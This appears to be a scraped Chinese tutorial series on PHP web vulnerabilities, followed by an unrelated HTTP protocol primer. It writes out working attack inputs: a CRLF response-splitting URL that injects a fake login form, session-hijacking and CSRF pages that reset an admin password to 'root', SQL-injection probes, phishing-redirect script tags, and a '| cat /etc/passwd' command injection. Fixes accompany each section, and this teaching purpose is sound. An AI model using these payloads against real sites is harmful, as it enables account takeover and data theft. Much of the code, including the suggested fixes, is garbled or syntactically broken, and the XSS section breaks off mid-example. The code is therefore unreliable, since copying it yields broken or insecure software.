PHP漏洞全解(八)HTTP响应拆分

HTTP请求的格式

1)请求信息:例如“Get /index.php HTTP/1.1”,请求index.php文件

2)表头:例如“Host: localhost”,表示服务器地址

3)空白行

4)信息正文

“请求信息”和“表头”都必须使用换行字符(CRLF)来结尾,空白行只能包含换行符,不可以有其他空格符。

下面例子发送HTTP请求给服务器www.yhsafe.com

GET /index.php HTTP/1.1↙ //请求信息

Host:www.yhsafe.com↙ //表头

↙ //空格行
↙符号表示回车键,在空白行之后还要在按一个空格才会发送HTTP请求,HTTP请求的表头中只有Host表头是必要的饿,其余的HTTP表头则是根据HTTP请求的内容而定。
HTTP请求的方法
1)GET:请求响应
2)HEAD:与GET相同的响应,只要求响应表头
3)POST:发送数据给服务器处理,数据包含在HTTP信息正文中
4)PUT:上传文件
5)DELETE:删除文件
6)TRACE:追踪收到的请求
7)OPTIONS:返回服务器所支持的HTTP请求的方法
8)CONNECT:将HTTP请求的连接转换成透明的TCP/IP通道
HTTP响应的格式
服务器在处理完客户端所提出的HTTP请求后,会发送下列响应。
1)第一行是状态码
2)第二行开始是其他信息
状态码包含一个标识状态的数字和一个描述状态的单词。例如:
HTTP/1.1 200 OK
200是标识状态的是数字,OK则是描述状态的单词,这个状态码标识请求成功。

HTTP请求和响应的例子

打开cmd输入telnet,输入open www.00aq.com 80

打开连接后输入

GET /index.php HTTP/1.1↙

Host:www.00aq.com↙

返回HTTP响应的表头

返回的首页内容

使用PHP来发送HTTP请求

header函数可以用来发送HTTP请求和响应的表头

函数原型

void header(string string [, bool replace [, int http_response_code]])

string是HTTP表头的字符串

如果replace为TRUE,表示要用目前的表头替换之前相似的表头;如果replace为FALSE,表示要使用多个相似的表头,默认值为TRUE

http_response_code用来强制HTTP响应码使用http_response_code的值

实例:

  1. // 打开Internet socket连接
  2. $fp = fsockopen(www.00aq.com, 80);
  3. // 写入HTTP请求表头
  4. fputs($fp“GET / HTTP/1.1\r\n”);
  5. fputs($fp“Host: www.00aq.com\r\n\r\n”);
  6. // HTTP响应的字符串
  7. $http_response = “”;
  8. while (!feof($fp))
  9. {
  10. // 读取256位的HTTP响应字符串
  11. $http_response .= fgets($fp, );
  12. }
  13. // 关闭Internet socket连接
  14. fclose($fp);
  15. // 显示HTTP响应信息
  16. echo nl2br(htmlentities($http_response));
  17. ?>

HTTP响应拆分攻击

HTTP响应拆分是由于攻击者经过精心设计利用电子邮件或者链接,让目标用户利用一个请求产生两个响应,前一个响应是服务器的响应,而后一个则是攻击者设计的响应。此攻击之所以会发生,是因为WEB程序将使用者的数据置于HTTP响应表头中,这些使用者的数据是有攻击者精心设计的。

可能遭受HTTP请求响应拆分的函数包括以下几个:

header(); setcookie(); session_id(); setrawcookie();

HTTP响应拆分通常发生在:

Location表头:将使用者的数据写入重定向的URL地址内

Set-Cookie表头:将使用者的数据写入cookies内

实例:

  1.     header(“Location: “ . $_GET[‘page’]);
  2. ?>

请求

GET /location.php?page=http://www.00aq.com HTTP/1.1↙

Host: localhost↙

返回

HTTP/1.1 302 Found

Date: Wed, 13 Jan 2010 03:44:24 GMT

Server: Apache/2.2.8 (Win32) PHP/5.2.6

X-Powered-By: PHP/5.2.6

Location: http://www.00aq.com

Content-Length: 0

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Content-Type: text/html

访问下面的链接,会直接出现一个登陆窗口

http://localhost/location.php?page=%0d%0aContent-Type:%20text/html%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%20158%0d%0a%0d%0a<form%20method=post%20name=form1>帐号%20<input%20type=text%20name=username%20><br%20>密码%20<input%20name=password%20type=password%20><br%20><input%20type=submit%20name=login%20value=登录%20>

转换成可读字符串为:

Content-Type: text/html

HTTP/1.1 200 OK

Content-Type: text/html

Content-Length: 158

帐号
密码

一个HTTP请求产生了两个响应

防范的方法:

1)替换CRLF换行字符

  1.     header(“Location: “ . strtr($_GET[‘page’], array(“\r”=>“”,    “\n”=>“”)));
  2. ?>

2)使用最新版本的PHP

PHP最新版中,已经不允许在HTTP表头内出现换行字符

隐藏HTTP响应表头

apache中httpd.conf,选项ServerTokens = Prod, ServerSignature = Off

php中php.ini,选项expose_php = Off

PHP漏洞全解(七)Session劫持

服务端和客户端之间是通过session(会话)来连接沟通。当客户端的浏览器连接到服务器后,服务器就会建立一个该用户的session。每个用户的session都是独立的,并且由服务器来维护。每个用户的session是由一个独特的字符串来识别,成为session id。用户发出请求时,所发送的http表头内包含session id 的值。服务器使用http表头内的session id来识别时哪个用户提交的请求。

session保存的是每个用户的个人数据,一般的web应用程序会使用session来保存通过验证的用户账号和密码。在转换不同的网页时,如果需要验证用户身份,就是用session内所保存的账号和密码来比较。session的生命周期从用户连上服务器后开始,在用户关掉浏览器或是注销时用户session_destroy函数删除session数据时结束。如果用户在20分钟内没有使用计算机的动作,session也会自动结束。

php处理session的应用架构

会话劫持

会话劫持是指攻击者利用各种手段来获取目标用户的session id。一旦获取到session id,那么攻击者可以利用目标用户的身份来登录网站,获取目标用户的操作权限。

攻击者获取目标用户session id的方法:

1)暴力破解:尝试各种session id,直到破解为止。

2)计算:如果session id使用非随机的方式产生,那么就有可能计算出来

3)窃取:使用网络截获,xss攻击等方法获得

会话劫持的攻击步骤

实例

  1. //login.php
  2. session_start();
  3. if (isset($_POST[“login”]))
  4. {
  5. $link = mysql_connect(“localhost”“root”“root”)
  6. or die(“无法建立MySQL数据库连接:” . mysql_error());
  7. mysql_select_db(“cms”or die(“无法选择MySQL数据库”);
  8. if (!get_magic_quotes_gpc())
  9. {
  10. $query = “select * from member where username=’” . addslashes($_POST[“username”]) .
  11. “’ and password=’” . addslashes($_POST[“password”]) . “’”;
  12. }
  13. else
  14. {
  15. $query = “select * from member where username=’” . $_POST[“username”] .
  16. “’ and password=’” . $_POST[“password”] . “’”;
  17. }
  18. $result = mysql_query($query)
  19. or die(“执行MySQL查询语句失败:” . mysql_error());
  20. $match_count = mysql_num_rows($result);
  21. if ($match_count)
  22. {
  23. $_SESSION[“username”] = $_POST[“username”];
  24. $_SESSION[“password”] = $_POST[“password”];
  25. $_SESSION[“book”] = 1;
  26. mysql_free_result($result);
  27. mysql_close($link);
  28. header(“Location: http://localhost/index.php?user=” .
  29. $_POST[“username”]);
  30. }

…..

  1. //index.php
  2. // 打开Session
  3. session_start();
  4. 访客的 Session ID 是:echo session_id(); ?>
  5. 访客:echo htmlspecialchars($_GET[“user”], ENT_QUOTES); ?>
  6. book商品的数量:echo htmlspecialchars($_SESSION[“book”], ENT_QUOTES); ?>
  7. 如果登录成功,使用
  8. $_SESSION[“username”] 保存账号
  9. $_SESSION[“password”] 保存密码
  10. #_SESSION[“book”] 保存购买商品数目

登录以后显示

开始攻击

  1. //attack.php
  2. php 
  3. // 打开Session
  4. session_start();
  5. echo “目标用户的Session ID是:” . session_id() . “<br />“;
  6. echo “目标用户的username是:” . $_SESSION[“username”] . “<br />“;
  7. echo “目标用户的password是:” . $_SESSION[“password”] . “<br />“;
  8. // 将book的数量设置为2000
  9. $_SESSION[“book”] = 2000;
  10. ?>

提交 http://localhost/attack.php?PHPSESSID=5a6kqe7cufhstuhcmhgr9nsg45 此ID为获取到的客户session id,刷新客户页面以后

客户购买的商品变成了2000

session固定攻击

黑客可以使用把session id发给用户的方式,来完成攻击

http://localhost/index.php?user=dodo&PHPSESSID=1234 把此链接发送给dodo这个用户显示

然后攻击者再访问 http://localhost/attack.php?PHPSESSID=1234 后,客户页面刷新,发现

商品数量已经成了2000

防范方法

1)定期更改session id

函数 bool session_regenerate_id([bool delete_old_session])

delete_old_session为true,则删除旧的session文件;为false,则保留旧的session,默认false,可选

在index.php开头加上

session_start();

session_regenerate_id(TRUE);

……

这样每次从新加载都会产生一个新的session id

2)更改session的名称

session的默认名称是PHPSESSID,此变量会保存在cookie中,如果黑客不抓包分析,就不能猜到这个名称,阻挡部分攻击

session_start();

session_name(“mysessionid”);

……

3)关闭透明化session id

透明化session id指当浏览器中的http请求没有使用cookies来制定session id时,sessioin id使用链接来传递;打开php.ini,编辑

session.use_trans_sid = 0

代码中

int_set(“session.use_trans_sid”, 0);

session_start();

……

4)只从cookie检查session id

session.use_cookies = 1 表示使用cookies存放session id

session.use_only_cookies = 1 表示只使用cookies存放session id,这可以避免session固定攻击

代码中

int_set(“session.use_cookies”, 1);

int_set(“session.use_only_cookies”, 1); p>

5)使用URL传递隐藏参数

session_start();

$seid = md5(uniqid(rand()), TRUE));

$_SESSION[“seid”] = $seid;

攻击者虽然能获取session数据,但是无法得知$seid的值,只要检查seid的值,就可以确认当前页面是否是web程序自己调用的。

PHP漏洞全解(六)跨网站请求伪造

CSRF(Cross Site Request Forgeries),意为跨网站请求伪造,也有写为XSRF。攻击者伪造目标用户的HTTP请求,然后此请求发送到有CSRF漏洞的网站,网站执行此请求后,引发跨站请求伪造攻击。攻击者利用隐蔽的HTTP连接,让目标用户在不注意的情况下单击这个链接,由于是用户自己点击的,而他又是合法用户拥有合法权限,所以目标用户能够在网站内执行特定的HTTP链接,从而达到攻击者的目的。

例如:某个购物网站购买商品时,采用http://www.shop.com/buy.php?item=watch&num=1,item参数确定要购买什么物品,num参数确定要购买数量,如果攻击者以隐藏的方式发送给目标用户链接

,那么如果目标用户不小心访问以后,购买的数量就成了1000个

实例

随缘网络PHP留言板V1.0

任意删除留言

//delbook.php 此页面用于删除留言

  1. include_once(“dlyz.php”); //dlyz.php用户验证权限,当权限是admin的时候方可删除留言
  2. include_once(“../conn.php”);
  3. $del=$_GET[“del”];
  4. $id=$_GET[“id”];
  5. if ($del==“data”)
  6. {
  7. $ID_Dele= implode(“,”,$_POST[‘adid’]);
  8. $sql=“delete from book where id in (“.$ID_Dele.“)”;
  9. mysql_query($sql);
  10. }
  11. else
  12. {
  13. $sql=“delete from book where id=”.$id//传递要删除的留言ID
  14. mysql_query($sql);
  15. }
  16. mysql_close($conn);
  17. echo “<script language=’javascript’>”;
  18. echo “alert(‘删除成功!’);”;
  19. echo ” location=’book.php’;”;
  20. echo “”;
  21. ?>

当我们具有admin权限,提交http://localhost/manage/delbook.php?id=2 时,就会删除id为2的留言

利用方法:

我们使用普通用户留言(源代码方式),内容为

  1. “delbook.php?id=2” />
  2. “delbook.php?id=3” />
  3. “delbook.php?id=4” />
  4. “delbook.php?id=5” />

插入4张图片链接分别删除4个id留言,然后我们返回首页浏览看,没有什么变化。。图片显示不了

现在我们再用管理员账号登陆后,来刷新首页,会发现留言就剩一条,其他在图片链接中指定的ID号的留言,全部都被删除。

攻击者在留言中插入隐藏的图片链接,此链接具有删除留言的作用,而攻击者自己访问这些图片链接的时候,是不具有权限的,所以看不到任何效果,但是当管理员登陆后,查看此留言,就会执行隐藏的链接,而他的权限又是足够大的,从而这些留言就被删除了

修改管理员密码

  1. //pass.php
  2. if($_GET[“act”])
  3. {
  4. $username=$_POST[“username”];
  5. $sh=$_POST[“sh”];
  6. $gg=$_POST[“gg”];
  7. $title=$_POST[“title”];
  8. $copyright=$_POST[“copyright”].
    设计制作:<a href=http: www.115cn.cn=””>厦门随缘网络科技”
    ;
  9. $password=md5($_POST[“password”]);
  10. if(emptyempty($_POST[“password”]))
  11. {
  12. $sql=“update gly set username=’”.$username.“’,sh=”.$sh.“,gg=’”.$gg.“’,title=’”.$title.“’,copyright=’”.$copyright.“’ where id=1”;
  13. }
  14. else
  15. {
  16. $sql=“update gly set username=’”.$username.“’,password=’”.$password.“’,sh=”.$sh.“,gg=’”.$gg.“’,title=’”.$title.“’,copyright=’”.$copyright.“’ where id=1”;
  17. }
  18. mysql_query($sql);
  19. mysql_close($conn);
  20. echo “<script language=’javascript’>”;
  21. echo “alert(‘修改成功!’);”;
  22. echo ” location=’pass.php’;”;
  23. echo “”;
  24. }

这个文件用于修改管理密码和网站设置的一些信息,我们可以直接构造如下表单:

  1. <body>
  2. <form action=“http://localhost/manage/pass.php?act=xg” method=“post” name=“form1” id=“form1”>
  3. <input type=“radio” value=“1” name=“sh”>
  4. <input type=“radio” name=“sh” checked value=“0”>
  5. <input type=“text” name=“username” value=“root”>
  6. <input type=“password” name=“password” value=“root”>
  7. <input type=“text” name=“title” value=“随缘网络PHP留言板V1.0(带审核功能)” >
  8. <textarea name=“gg” rows=“6” cols=“80” >欢迎您安装使用随缘网络PHP留言板V1.0(带审核功能)!textarea> 
  9. <textarea name=“copyright” rows=“6” cols=“80” >随缘网络PHP留言本V1.0 版权所有:厦门随缘网络科技 2005-2009<br/>承接网站建设及系统定制 提供优惠主机域名textarea> 
  10. form> 
  11. body> 

存为attack.html,放到自己网站上http://www.sectop.com/attack.html,此页面访问后会自动向目标程序的pass.php提交参数,用户名修改为root,密码修改为root,然后我们去留言板发一条留言,隐藏这个链接,管理访问以后,他的用户名和密码全部修改成了root

防范方法

防范CSRF要比防范其他攻击更加困难,因为CSRF的HTTP请求虽然是攻击者伪造的,但是却是由目标用户发出的,一般常见的防范方法有下面几种:

1、检查网页的来源

2、检查内置的隐藏变量

3、使用POST,不要使用GET

检查网页来源

在//pass.php头部加入以下红色字体代码,验证数据提交

  1. if($_GET[“act”])
  2. {
  3. if(isset($_SERVER[“HTTP_REFERER”]))
  4. {
  5. $serverhost = $_SERVER[“SERVER_NAME”];
  6. $strurl = str_replace(“http://”,“”,$_SERVER[“HTTP_REFERER”]);
  7. $strdomain = explode(“/”,$strurl);
  8. $sourcehost = $strdomain[0];
  9. if(strncmp($sourcehost$serverhoststrlen($serverhost)))
  10. {
  11. unset($_POST);
  12. echo “<script language=’javascript’>”;
  13. echo “alert(‘数据来源异常!’);”;
  14. echo ” location=’index.php’;”;
  15. echo “”;
  16. }
  17. }
  18. $username=$_POST[“username”];
  19. $sh=$_POST[“sh”];
  20. $gg=$_POST[“gg”];
  21. $title=$_POST[“title”];
  22. $copyright=$_POST[“copyright”].
    设计制作:<a href=http: www.115cn.cn=””>厦门随缘网络科技”
    ;
  23. $password=md5($_POST[“password”]);
  24. if(emptyempty($_POST[“password”]))
  25. {
  26. $sql=“update gly set username=’”.$username.“’,sh=”.$sh.“,gg=’”.$gg.“’,title=’”.$title.“’,copyright=’”.$copyright.“’ where id=1”;
  27. }
  28. else
  29. {
  30. $sql=“update gly set username=’”.$username.“’,password=’”.$password.“’,sh=”.$sh.“,gg=’”.$gg.“’,title=’”.$title.“’,copyright=’”.$copyright.“’ where id=1”;
  31. }
  32. mysql_query($sql);
  33. mysql_close($conn);
  34. echo “<script language=’javascript’>”;
  35. echo “alert(‘修改成功!’);”;
  36. echo ” location=’pass.php’;”;
  37. echo “”;
  38. }

检查内置隐藏变量

我们在表单中内置一个隐藏变量和一个session变量,然后检查这个隐藏变量和session变量是否相等,以此来判断是否同一个网页所调用

  1. php 
  2. include_once(“dlyz.php”);
  3. include_once(“../conn.php”);
  4. if($_GET[“act”])
  5. {
  6. if (!isset($_SESSION[“post_id”]))
  7. {
  8. // 生成唯一的ID,并使用MD5来加密
  9. $post_id = md5(uniqid(rand(), true));
  10. // 创建Session变量
  11. $_SESSION[“post_id”] = $post_id;
  12. }
  13. // 检查是否相等
  14. if (isset($_SESSION[“post_id”]))
  15. {
  16. // 不相等
  17. if ($_SESSION[“post_id”] != $_POST[“post_id”])
  18. {
  19. // 清除POST变量
  20. unset($_POST);
  21. echo “<script language=’javascript’>“;
  22. echo “alert(‘数据来源异常!’);”;
  23. echo ” location=’index.php’;”;
  24. echo “script>“; 
  25. }
  26. }
  27. ……
  28. <input type=“reset” name=“Submit2” value=“重 置”>
  29. <input type=“hidden” name=“post_id” value=”php echo $_SESSION[“post_id“];?>”> 
  30. td>tr> 
  31. table> 
  32. form> 
  33. php 
  34. }
  35. mysql_close($conn);
  36. ?>
  37. body> 
  38. html> 

使用POST,不要使用GET

传递表单字段时,一定要是用POST,不要使用GET,处理变量也不要直接使用$_REQUEST

PHP漏洞全解(五)SQL注入攻击

SQL注入攻击(SQL Injection),是攻击者在表单中提交精心构造的sql语句,改动原来的sql语句,如果web程序没有对提交的数据经过检查,那么就会造成sql注入攻击。

SQL注入攻击的一般步骤:

1、攻击者访问有SQL注入漏洞的站点,寻找注入点

2、攻击者构造注入语句,注入语句和程序中的SQL语句结合生成新的sql语句

3、新的sql语句被提交到数据库中执行 处理

4、数据库执行了新的SQL语句,引发SQL注入攻击

实例

数据库

  1. CREATE TABLE `postmessage` (
  2. `id` int(11) NOT NULL auto_increment,
  3. `subject` varchar(60) NOT NULL default ”,
  4. `namevarchar(40) NOT NULL default ”,
  5. `email` varchar(25) NOT NULL default ”,
  6. `question` mediumtext NOT NULL,
  7. `postdate` datetime NOT NULL default ’0000-00-00 00:00:00′,
  8. PRIMARY KEY (`id`)
  9. ) ENGINE=MyISAM DEFAULT CHARSET=gb2312 COMMENT=’运用者的留言’ AUTO_INCREMENT=69 ;
  10. grant all privileges on ch3.* to ‘sectop’@localhost identified by ’123456′;
  11. //add.php 插入留言
  12. //list.php 留言列表
  13. //show.php 显示留言

页面 http://www.netsos.com.cn/show.php?id=71 可能存在注入点,我们来测试

http://www.netsos.com.cn/show.php?id=71 and 1=1

返回页面

一次查询到记录,一次没有,我们来看看源码

//show.php 12-15行

// 执行mysql查询语句

$query = “select * from postmessage where id = “.$_GET[“id”];

$result = mysql_query($query)

or die(“执行ySQL查询语句失败:” . mysql_error());

参数id传递进来后,和前面的字符串结合的sql语句放入数据库执行 查询

提交 and 1=1,语句变成select * from postmessage where id = 71 and 1=1 这语句前值后值都为真,and以后也为真,返回查询到的数据

提交 and 1=2,语句变成select * from postmessage where id = 71 and 1=2 这语句前值为真,后值为假,and以后为假,查询不到任何数据

正常的SQL查询,经过我们构造的语句之后,形成了SQL注入攻击。通过这个注入点,我们还可以进一步拿到权限,比如说运用 union读取管理密码,读取数据库信息,或者用mysql的load_file,into outfile等函数进一步渗透。

防范方法

整型参数:

运用 intval函数将数据转换成整数

函数原型

int intval(mixed var, int base)

var是要转换成整形的变量

base,可选,是基础数,默认是10

浮点型参数:

运用 floatval或doubleval函数分别转换单精度和双精度浮点型参数

函数原型

int floatval(mixed var)

var是要转换的变量

int doubleval(mixed var)

var是要转换的变量

字符型参数:

运用 addslashes函数来将单引号“’”转换成“\’”,双引号“””转换成“\””,反斜杠“\”转换成“\\”,NULL字符加上反斜杠“\”

函数原型

string addslashes (string str)

str是要检查的字符串

那么刚才出现的代码漏洞,我们可以这样修补

// 执行mysql查询语句

$query = “select * from postmessage where id = “.intval($_GET[“id”]);

$result = mysql_query($query)

or die(“执行ySQL查询语句失败:” . mysql_error());

如果是字符型,先判断magic_quotes_gpc能无法 为On,当不为On的时候运用 addslashes转义特殊字符

  1. if(get_magic_quotes_gpc())
  2. {
  3.     $var = $_GET[“var”];
  4. }
  5.  else
  6.  {
  7.   $var = addslashes($_GET[“var”]);
  8. }

再次测试,漏洞已经修补

PHP漏洞全解(四)xss跨站脚本攻击

XSS(Cross Site Scripting),意为跨网站脚本攻击,为了和样式表css(Cascading Style Sheet)区别,缩写为XSS

跨站脚本主要被攻击者利用来读取网站用户的cookies或者其他个人数据,一旦攻击者得到这些数据,那么他就可以伪装成此用户来登录网站,获得此用户的权限。

跨站脚本攻击的一般步骤:

1、攻击者以某种方式发送xss的http链接给目标用户

2、目标用户登录此网站,在登陆期间打开了攻击者发送的xss链接

3、网站执行了此xss攻击脚本

4、目标用户页面跳转到攻击者的网站,攻击者取得了目标用户的信息

5、攻击者使用目标用户的信息登录网站,完成攻击

当有存在跨站漏洞的程序出现的时候,攻击者可以构造类似http://www.sectop.com/search.php?key=” method=”POST”>

跨站脚本被插进去了

防御方法还是使用htmlspecialchars过滤输出的变量,或者提交给自身文件的表单使用

 

这样直接避免了$_SERVER[“PHP_SELF”]变量被跨站

PHP漏洞全解(三)客户端脚本植入

客户端脚本植入(Script Insertion),是指将可以执行的脚本插入到表单、图片、动画或超链接文字等对象内。当用户打开这些对象后,攻击者所植入的脚本就会被执行,进而开始攻击。

可以被用作脚本植入的HTML标签一般包括以下几种:

1、<script>标签标记的javascript和vbscript等页面脚本程序。在<script>标签内可以指定js程序代码,也可以在src属性内指定js文件的URL路径

2、<object>标签标记的对象。这些对象是java applet、多媒体文件和ActiveX控件等。通常在data属性内指定对象的URL路径

3、<embed>标签标记的对象。这些对象是多媒体文件,例如:swf文件。通常在src属性内指定对象的URL路径

4、<applet>标签标记的对象。这些对象是java applet,通常在codebase属性内指定对象的URL路径

5、<form>标签标记的对象。通常在action属性内指定要处理表单数据的web应用程序的URL路径

客户端脚本植入的攻击步骤

1、攻击者注册普通用户后登陆网站

2、打开留言页面,插入攻击的js代码

3、其他用户登录网站(包括管理员),浏览此留言的内容

4、隐藏在留言内容中的js代码被执行,攻击成功

实例

数据库

CREATE TABLE `postmessage` (

`id` int(11) NOT NULL auto_increment,

`subject` varchar(60) NOT NULL default ”,

`name` varchar(40) NOT NULL default ”,

`email` varchar(25) NOT NULL default ”,

`question` mediumtext NOT NULL,

`postdate` datetime NOT NULL default ’0000-00-00 00:00:00′,

PRIMARY KEY (`id`)

) ENGINE=MyISAM DEFAULT CHARSET=gb2312 COMMENT=’使用者的留言’ AUTO_INCREMENT=69 ;

//add.php 插入留言

//list.php 留言列表

//show.php 显示留言

提交下图的留言

浏览此留言的时候会执行js脚本

插入 <script>while(1){windows.open();}</script> 无限弹框

插入<script>location.href=”http://www.sectop.com”;</script> 跳转钓鱼页面

或者使用其他自行构造的js代码进行攻击

防范的方法

一般使用htmlspecialchars函数来将特殊字符转换成HTML编码

函数原型

string htmlspecialchars (string string, int quote_style, string charset)

string 是要编码的字符串

quote_style 可选,值可为ENT_COMPAT、ENT_QUOTES、ENT_NOQUOTES,默认值ENT_COMPAT,表示只转换双引号不转换单引号。ENT_QUOTES,表示双引号和单引号都要转换。ENT_NOQUOTES,表示双引号和单引号都不转换

charset 可选,表示使用的字符集

函数会将下列特殊字符转换成html编码:

& —-> &

” —-> ”

‘ —-> ‘

< —-> <

> —-> >

把show.php的第98行改成

<?php echo htmlspecialchars(nl2br($row[‘question’]), ENT_QUOTES); ?>

然后再查看插入js的漏洞页面

PHP漏洞全解(二)命令注入攻击

命令注入攻击

PHP中可以使用下列5个函数来执行外部的应用程序或函数

system、exec、passthru、shell_exec、“(与shell_exec功能相同)

函数原型

string system(string command, int &return_var)

command 要执行的命令

return_var 存放执行命令的执行后的状态值

string exec (string command, array &output, int &return_var)

command 要执行的命令

output 获得执行命令输出的每一行字符串

return_var 存放执行命令后的状态值

void passthru (string command, int &return_var)

command 要执行的命令

return_var 存放执行命令后的状态值

string shell_exec (string command)

command 要执行的命令

漏洞实例

例1:

  1. //ex1.php
  2. $dir = $_GET[“dir”];
  3. if (isset($dir))
  4. {
  5. echo 
    ";
  6. system(“ls -al “.$dir);
  7. echo 

“;

  • }
  • ?>

 

我们提交http://www.sectop.com/ex1.php?dir=| cat /etc/passwd

提交以后,命令变成了 system(“ls -al | cat /etc/passwd”);

eval注入攻击

eval函数将输入的字符串参数当作PHP程序代码来执行

函数原型:

mixed eval(string code_str) //eval注入一般发生在攻击者能控制输入的字符串的时候

  1. //ex2.php
  2. $var = “var”;
  3. if (isset($_GET[“arg”]))
  4. {
  5. $arg = $_GET[“arg”];
  6. eval(“\$var = $arg;”);
  7. echo “\$var =”.$var;
  8. }
  9. ?>

当我们提交http://www.sectop.com/ex2.php?arg=phpinfo();漏洞就产生了;

动态函数

  1. php 
  2. func A()
  3. {
  4. dosomething();
  5. }
  6. func B()
  7. {
  8. dosomething();
  9. }
  10. if (isset($_GET[“func”]))
  11. {
  12. $myfunc = $_GET[“func”];
  13. echo $myfunc();
  14. }
  15. ?>

程序员原意是想动态调用A和B函数,那我们提交http://www.sectop.com/ex.php?func=phpinfo漏洞产生

防范方法

1、尽量不要执行外部命令

2、使用自定义函数或函数库来替代外部命令的功能

3、使用escapeshellarg函数来处理命令参数

4、使用safe_mode_exec_dir指定可执行文件的路径

esacpeshellarg函数会将任何引起参数或命令结束的字符转义,单引号“’”,替换成“\’”,双引号“””,替换成“\””,分号“;”替换成“\;”

用safe_mode_exec_dir指定可执行文件的路径,可以把会使用的命令提前放入此路径内

safe_mode = On

safe_mode_exec_dir = /usr/local/php/bin/

PHP漏洞全解(一)–PHP网站的安全性问题

针对PHP的网站主要存在下面几种攻击方式:

1、命令注入(Command Injection)

2、eval注入(Eval Injection)

3、客户端脚本攻击(Script Insertion)

4、跨网站脚本攻击(Cross Site Scripting, XSS)

5、SQL注入攻击(SQL injection)

6、跨网站请求伪造攻击(Cross Site Request Forgeries, CSRF)

7、Session 会话劫持(Session Hijacking)

8、Session 固定攻击(Session Fixation)

9、HTTP响应拆分攻击(HTTP Response Splitting)

10、文件上传漏洞(File Upload Attack)

11、目录穿越漏洞(Directory Traversal)

12、远程文件包含攻击(Remote Inclusion)

13、动态函数注入攻击(Dynamic Variable Evaluation)

14、URL攻击(URL attack)

15、表单提交欺骗攻击(Spoofed Form Submissions)

16、HTTP请求欺骗攻击(Spoofed HTTP Requests)

几个重要的php.ini选项:

RegisterGlobals

php>=4.2.0,php.ini的register_globals选项的默认值预设为Off,当register_globals

的设定为On时,程序可以接收来自服务器的各种环境变量,包括表单提交的变量,而且由于PHP不必事先初始化变量的值,从而导致很大的安全隐患。

深入浅出HTTP协议(WEB开发和面试必备)

深入浅出HTTP协议(WEB开发和面试必备)

转载:http://www.cnblogs.com/royi123/archive/2013/06/14/3136702.html

1. 基础概念篇

  a.简介

HTTP是Hyper Text Transfer Protocol(超文本传输协议)的缩写。它的发展是万维网协会(World Wide Web Consortium)和Internet工作小组IETF(Internet Engineering Task Force)合作的结果,(他们)最终发布了一系列的RFC,RFC 1945定义了HTTP/1.0版本。其中最著名的就是RFC 2616。RFC 2616定义了今天普遍使用的一个版本——HTTP 1.1。

HTTP协议(HyperText Transfer Protocol,超文本传输协议)是用于从WWW服务器传输超文本到本地浏览器的传送协议。它可以使浏览器更加高效,使网络传输减少。它不仅保证计算机正确快速地传输超文本文档,还确定传输文档中的哪一部分,以及哪部分内容首先显示(如文本先于图形)等。

 

HTTP是一个应用层协议,由请求和响应构成,是一个标准的客户端服务器模型。HTTP是一个无状态的协议。

b.在TCP/IP协议栈中的位置

HTTP协议通常承载于TCP协议之上,有时也承载于TLS或SSL协议层之上,这个时候,就成了我们常说的HTTPS.

 

 

 

 

 

默认HTTP的端口号为80,HTTPS的端口号为443。

c.HTTP的请求响应模型

HTTP协议永远都是客户端发起请求,服务器回送响应.

这样就限制了使用HTTP协议,无法实现在客户端没有发起请求的时候,服务器将消息推送给客户端。

 

HTTP协议是一个无状态的协议,同一个客户端的这次请求和上次请求是没有对应关系。

d.工作流程

 

一次HTTP操作称为一个事务,其工作过程可分为四步:

 

1)首先客户机与服务器需要建立连接。只要单击某个超级链接,HTTP的工作开始。

 

2)建立连接后,客户机发送一个请求给服务器,请求方式的格式为:统一资源标识符(URL)、协议版本号,后边是MIME信息包括请求修饰符、客户机信息和可能的内容。

 

3)服务器接到请求后,给予相应的响应信息,其格式为一个状态行,包括信息的协议版本号、一个成功或错误的代码,后边是MIME信息包括服务器信息、实体信息和可能的内容。

 

4)客户端接收服务器所返回的信息通过浏览器显示在用户的显示屏上,然后客户机与服务器断开连接。

 

如果在以上过程中的某一步出现错误,那么产生错误的信息将返回到客户端,有显示屏输出。对于用户来说,这些过程是由HTTP自己完成的,用户只要用鼠标点击,等待信息显示就可以了。
e.使用Wireshark抓TCP、http包

打开Wireshark,选择工具栏上的“Capture”->“Options”,界面选择如图1所示:

 

 

 

一般读者只需要选择最上边的下拉框,选择合适的Device,而后点击“Capture Filter”,此处选择的是“HTTP TCP port(80)”,选择后点击上图的“Start”开始抓包。

图2 选择Capture Filter

例如在浏览器中打开http://image.baidu.com/,抓包如图3所示:
/uploads/allimg/120605/101230C05-4.jpg

图3   抓包

在上图中,可清晰的看到客户端浏览器(ip为192.168.2.33)与服务器的交互过程:

1)No1:浏览器(192.168.2.33)向服务器(220.181.50.118)发出连接请求。此为TCP三次握手第一步,此时从图中可以看出,为SYN,seq:X (x=0)

2)No2:服务器(220.181.50.118)回应了浏览器(192.168.2.33)的请求,并要求确认,此时为:SYN,ACK,此时seq:y(y为0),ACK:x+1(为1)。此为三次握手的第二步;

3)No3:浏览器(192.168.2.33)回应了服务器(220.181.50.118)的确认,连接成功。为:ACK,此时seq:x+1(为1),ACK:y+1(为1)。此为三次握手的第三步;

4)No4:浏览器(192.168.2.33)发出一个页面HTTP请求;

5)No5:服务器(220.181.50.118)确认;

6)No6:服务器(220.181.50.118)发送数据;

7)No7:客户端浏览器(192.168.2.33)确认;

8)No14:客户端(192.168.2.33)发出一个图片HTTP请求;

9)No15:服务器(220.181.50.118)发送状态响应码200 OK

……

f.头域

每个头域由一个域名,冒号(:)和域值三部分组成。域名是大小写无关的,域值前可以添加任何数量的空格符,头域可以被扩展为多行,在每行开始处,使用至少一个空格或制表符。

 

在抓包的图中,No14点开可看到如图4所示:
/uploads/allimg/120605/1012303106-5.jpg

 

图4 http请求消息

 

回应的消息如图5所示:

 

图5 http状态响应信息

 

1.6.1 host头域

 

Host头域指定请求资源的Intenet主机和端口号,必须表示请求url的原始服务器或网关的位置。HTTP/1.1请求必须包含主机头域,否则系统会以400状态码返回。

 

图5中host那行为:

 

1.6.2 Referer头域

 

Referer头域允许客户端指定请求uri的源资源地址,这可以允许服务器生成回退链表,可用来登陆、优化cache等。他也允许废除的或错误的连接由于维护的目的被追踪。如果请求的uri没有自己的uri地址,Referer不能被发送。如果指定的是部分uri地址,则此地址应该是一个相对地址。

 

在图4中,Referer行的内容为:

 

1.6.3 User-Agent头域

 

User-Agent头域的内容包含发出请求的用户信息。

 

在图4中,User-Agent行的内容为:
